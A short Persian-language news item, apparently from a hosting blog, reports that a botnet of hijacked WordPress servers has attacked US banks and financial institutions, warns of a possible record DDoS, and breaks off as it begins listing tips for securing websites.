در روزهای اخیر پیرو گزارشات امنیتی متعدد، بخش امنیت موسسات مالی آمریکا، متوجه حملات گسترده ای از سوی سرورها بر روی موسسات مالی و بانک‌های این کشورشدند. پیگیری این حملات سایبری منجر به ردیابی یک حمله سراسری با احتمال تولد یکی از مخرب ترین Botnet های دنیای مجازی شد. پس از بررسی و تحلیل الگوی حملات نتیجه حاصل حاکی از شروع حملات از سیستم های مدیریت محتوا (CMS)، خصوصاٌ وردپرس بود. هدف نهایی این حمله تشکیل ارتشی از سرورهای میزبان wordpress است. یک پست وبلاگی منتشر شده در سرویس هاست ResellerClub نحوه شروع این حمله را نفوذ و سرقت اکانت‌های ادمین، سپس تزریق اسکریپتهای آلوده به پوشه‌های اکانت ذکر می کند. با توجه به هدف قرار دادن سرورها می توان گفت احتمال رخ دادن یکی از بزرگترین حملات DDOS تاریخ اینترنت دور از ذهن نیست. زیرا پهنای باند سرورها بطور معمول ده ، صد و حتی هزاران برابر بیشتر از کامپیوترهای معمولی است و در صورت حمله، سرورها قادرند میزان ترافیک عظیمی را ایجاد و مدیریت کنند. متاسفانه مسدود سازی فعالیتهای خرابکارانه با توجه به گستردگی حمله و استفاده از IP های جعلی با موانعی روبرو شده است. نکات زیر می توانند شما را برای امن نگاه داشتن وبسایت های […]